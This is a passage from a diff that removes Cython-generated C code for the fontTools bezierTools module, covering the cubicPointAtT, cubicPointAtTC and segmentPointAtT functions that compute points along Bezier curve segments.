__pyx_v_x = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1080 - * ) - * y = ( - * _1_t_2 * _1_t * pt1[1] # <<<<<<<<<<<<<< - * + 3 * (_1_t_2 * t * pt2[1] + _1_t * t2 * pt3[1]) - * + t2 * t * pt4[1] - */ - __pyx_t_3 = PyNumber_Multiply(__pyx_v__1_t_2, __pyx_v__1_t); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1080, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_GetItemInt(__pyx_v_pt1, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1080, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_2 = PyNumber_Multiply(__pyx_t_3, __pyx_t_4); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1080, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":1081 - * y = ( - * _1_t_2 * _1_t * pt1[1] - * + 3 * (_1_t_2 * t * pt2[1] + _1_t * t2 * pt3[1]) # <<<<<<<<<<<<<< - * + t2 * t * pt4[1] - * ) - */ - __pyx_t_4 = PyNumber_Multiply(__pyx_v__1_t_2, __pyx_v_t); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1081, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_3 = __Pyx_GetItemInt(__pyx_v_pt2, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1081, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_5 = PyNumber_Multiply(__pyx_t_4, __pyx_t_3); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1081, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Multiply(__pyx_v__1_t, __pyx_v_t2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1081, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_GetItemInt(__pyx_v_pt3, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1081, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_1 = PyNumber_Multiply(__pyx_t_3, __pyx_t_4); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1081, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Add(__pyx_t_5, __pyx_t_1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1081, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = __Pyx_PyInt_MultiplyCObj(__pyx_int_3, __pyx_t_4, 3, 0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1081, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Add(__pyx_t_2, __pyx_t_1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1081, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1082 - * _1_t_2 * _1_t * pt1[1] - * + 3 * (_1_t_2 * t * pt2[1] + _1_t * t2 * pt3[1]) - * + t2 * t * pt4[1] # <<<<<<<<<<<<<< - * ) - * return (x, y) - */ - __pyx_t_1 = PyNumber_Multiply(__pyx_v_t2, __pyx_v_t); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1082, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_pt4, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1082, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_5 = PyNumber_Multiply(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1082, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Add(__pyx_t_4, __pyx_t_5); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1082, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_v_y = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1084 - * + t2 * t * pt4[1] - * ) - * return (x, y) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1084, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_x); - __Pyx_GIVEREF(__pyx_v_x); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_v_x)) __PYX_ERR(0, 1084, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_y); - __Pyx_GIVEREF(__pyx_v_y); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_v_y)) __PYX_ERR(0, 1084, __pyx_L1_error); - __pyx_r = __pyx_t_2; - __pyx_t_2 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1061 - * - * - * def cubicPointAtT(pt1, pt2, pt3, pt4, t): # <<<<<<<<<<<<<< - * """Finds the point at time `t` on a cubic curve. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_AddTraceback("fontTools.misc.bezierTools.cubicPointAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_t2); - __Pyx_XDECREF(__pyx_v__1_t); - __Pyx_XDECREF(__pyx_v__1_t_2); - __Pyx_XDECREF(__pyx_v_x); - __Pyx_XDECREF(__pyx_v_y); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1087 - * - * - * @cython.returns(cython.complex) # <<<<<<<<<<<<<< - * @cython.locals( - * t=cython.double, - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_65cubicPointAtTC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_64cubicPointAtTC, "cubicPointAtTC(double complex pt1, double complex pt2, double complex pt3, double complex pt4, double t)\nFinds the point at time `t` on a cubic curve.\n\n Args:\n pt1, pt2, pt3, pt4: Coordinates of the curve as complex numbers.\n t: The time along the curve.\n\n Returns:\n A complex number with the coordinates of the point.\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_65cubicPointAtTC = {"cubicPointAtTC", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_65cubicPointAtTC, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_64cubicPointAtTC}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_65cubicPointAtTC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - __pyx_t_double_complex __pyx_v_pt1; - __pyx_t_double_complex __pyx_v_pt2; - __pyx_t_double_complex __pyx_v_pt3; - __pyx_t_double_complex __pyx_v_pt4; - double __pyx_v_t; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[5] = {0,0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("cubicPointAtTC (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_pt4,&__pyx_n_s_t,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - CYTHON_FALLTHROUGH; - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1087, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1087, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("cubicPointAtTC", 1, 5, 5, 1); __PYX_ERR(0, 1087, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1087, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("cubicPointAtTC", 1, 5, 5, 2); __PYX_ERR(0, 1087, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt4)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1087, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("cubicPointAtTC", 1, 5, 5, 3); __PYX_ERR(0, 1087, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 4: - if (likely((values[4] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_t)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[4]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1087, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("cubicPointAtTC", 1, 5, 5, 4); __PYX_ERR(0, 1087, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "cubicPointAtTC") < 0)) __PYX_ERR(0, 1087, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 5)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - } - __pyx_v_pt1 = __Pyx_PyComplex_As___pyx_t_double_complex(values[0]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1096, __pyx_L3_error) - __pyx_v_pt2 = __Pyx_PyComplex_As___pyx_t_double_complex(values[1]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1096, __pyx_L3_error) - __pyx_v_pt3 = __Pyx_PyComplex_As___pyx_t_double_complex(values[2]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1096, __pyx_L3_error) - __pyx_v_pt4 = __Pyx_PyComplex_As___pyx_t_double_complex(values[3]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1096, __pyx_L3_error) - __pyx_v_t = __pyx_PyFloat_AsDouble(values[4]); if (unlikely((__pyx_v_t == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 1096, __pyx_L3_error) - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("cubicPointAtTC", 1, 5, 5, __pyx_nargs); __PYX_ERR(0, 1087, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.cubicPointAtTC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_64cubicPointAtTC(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4, __pyx_v_t); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_64cubicPointAtTC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3, __pyx_t_double_complex __pyx_v_pt4, double __pyx_v_t) { - double __pyx_v_t2; - double __pyx_v__1_t; - double __pyx_v__1_t_2; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - __pyx_t_double_complex __pyx_t_1; - PyObject *__pyx_t_2 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("cubicPointAtTC", 1); - - /* "fontTools/misc/bezierTools.py":1106 - * A complex number with the coordinates of the point. - * """ - * t2 = t * t # <<<<<<<<<<<<<< - * _1_t = 1 - t - * _1_t_2 = _1_t * _1_t - */ - __pyx_v_t2 = (__pyx_v_t * __pyx_v_t); - - /* "fontTools/misc/bezierTools.py":1107 - * """ - * t2 = t * t - * _1_t = 1 - t # <<<<<<<<<<<<<< - * _1_t_2 = _1_t * _1_t - * return _1_t_2 * _1_t * pt1 + 3 * (_1_t_2 * t * pt2 + _1_t * t2 * pt3) + t2 * t * pt4 - */ - __pyx_v__1_t = (1.0 - __pyx_v_t); - - /* "fontTools/misc/bezierTools.py":1108 - * t2 = t * t - * _1_t = 1 - t - * _1_t_2 = _1_t * _1_t # <<<<<<<<<<<<<< - * return _1_t_2 * _1_t * pt1 + 3 * (_1_t_2 * t * pt2 + _1_t * t2 * pt3) + t2 * t * pt4 - * - */ - __pyx_v__1_t_2 = (__pyx_v__1_t * __pyx_v__1_t); - - /* "fontTools/misc/bezierTools.py":1109 - * _1_t = 1 - t - * _1_t_2 = _1_t * _1_t - * return _1_t_2 * _1_t * pt1 + 3 * (_1_t_2 * t * pt2 + _1_t * t2 * pt3) + t2 * t * pt4 # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = __Pyx_c_sum_double(__Pyx_c_sum_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts((__pyx_v__1_t_2 * __pyx_v__1_t), 0), __pyx_v_pt1), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(3, 0), __Pyx_c_sum_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts((__pyx_v__1_t_2 * __pyx_v_t), 0), __pyx_v_pt2), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts((__pyx_v__1_t * __pyx_v_t2), 0), __pyx_v_pt3)))), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts((__pyx_v_t2 * __pyx_v_t), 0), __pyx_v_pt4)); - __pyx_t_2 = __pyx_PyComplex_FromComplex(__pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1109, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_r = __pyx_t_2; - __pyx_t_2 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1087 - * - * - * @cython.returns(cython.complex) # <<<<<<<<<<<<<< - * @cython.locals( - * t=cython.double, - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_2); - __Pyx_AddTraceback("fontTools.misc.bezierTools.cubicPointAtTC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1112 - * - * - * def segmentPointAtT(seg, t): # <<<<<<<<<<<<<< - * if len(seg) == 2: - * return linePointAtT(*seg, t) - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_67segmentPointAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_66segmentPointAtT, "segmentPointAtT(seg, t)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_67segmentPointAtT = {"segmentPointAtT", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_67segmentPointAtT, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_66segmentPointAtT}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_67segmentPointAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_seg = 0; - PyObject *__pyx_v_t = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[2] = {0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("segmentPointAtT (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_seg,&__pyx_n_s_t,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_seg)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1112, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_t)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1112, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("segmentPointAtT", 1, 2, 2, 1); __PYX_ERR(0, 1112, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "segmentPointAtT") < 0)) __PYX_ERR(0, 1112, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 2)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - } - __pyx_v_seg = values[0]; - __pyx_v_t = values[1]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("segmentPointAtT", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 1112, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.segmentPointAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_66segmentPointAtT(__pyx_self, __pyx_v_seg, __pyx_v_t); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_66segmentPointAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_seg, PyObject *__pyx_v_t) { - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - Py_ssize_t __pyx_t_1; - int __pyx_t_2; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("segmentPointAtT", 1); - - /* "fontTools/misc/bezierTools.py":1113 - * - * def segmentPointAtT(seg, t): - * if len(seg) == 2: # <<<<<<<<<<<<<< - * return linePointAtT(*seg, t) - * elif len(seg) == 3: - */ - __pyx_t_1 = PyObject_Length(__pyx_v_seg); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1113, __pyx_L1_error) - __pyx_t_2 = (__pyx_t_1 == 2); - if (__pyx_t_2) { - - /* "fontTools/misc/bezierTools.py":1114 - * def segmentPointAtT(seg, t): - * if len(seg) == 2: - * return linePointAtT(*seg, t) # <<<<<<<<<<<<<< - * elif len(seg) == 3: - * return quadraticPointAtT(*seg, t) - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_linePointAtT); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1114, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PySequence_Tuple(__pyx_v_seg); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1114, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = PyTuple_New(1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1114, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_INCREF(__pyx_v_t); - __Pyx_GIVEREF(__pyx_v_t); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_v_t)) __PYX_ERR(0, 1114, __pyx_L1_error); - __pyx_t_6 = PyNumber_Add(__pyx_t_4, __pyx_t_5); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1114, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_3, __pyx_t_6, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1114, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1113 - * - * def segmentPointAtT(seg, t): - * if len(seg) == 2: # <<<<<<<<<<<<<< - * return linePointAtT(*seg, t) - * elif len(seg) == 3: - */ - } - - /* "fontTools/misc/bezierTools.py":1115 - * if len(seg) == 2: - * return linePointAtT(*seg, t) - * elif len(seg) == 3: # <<<<<<<<<<<<<< - * return quadraticPointAtT(*seg, t) - * elif len(seg) == 4: - */ - __pyx_t_1 = PyObject_Length(__pyx_v_seg); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1115, __pyx_L1_error) - __pyx_t_2 = (__pyx_t_1 == 3); - if (__pyx_t_2) { - - /* "fontTools/misc/bezierTools.py":1116 - * return linePointAtT(*seg, t) - * elif len(seg) == 3: - * return quadraticPointAtT(*seg, t) # <<<<<<<<<<<<<< - * elif len(seg) == 4: - * return cubicPointAtT(*seg, t) - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_quadraticPointAtT); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1116, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_6 = __Pyx_PySequence_Tuple(__pyx_v_seg); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1116, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_3 = PyTuple_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1116, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_t); - __Pyx_GIVEREF(__pyx_v_t); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_t)) __PYX_ERR(0, 1116, __pyx_L1_error); - 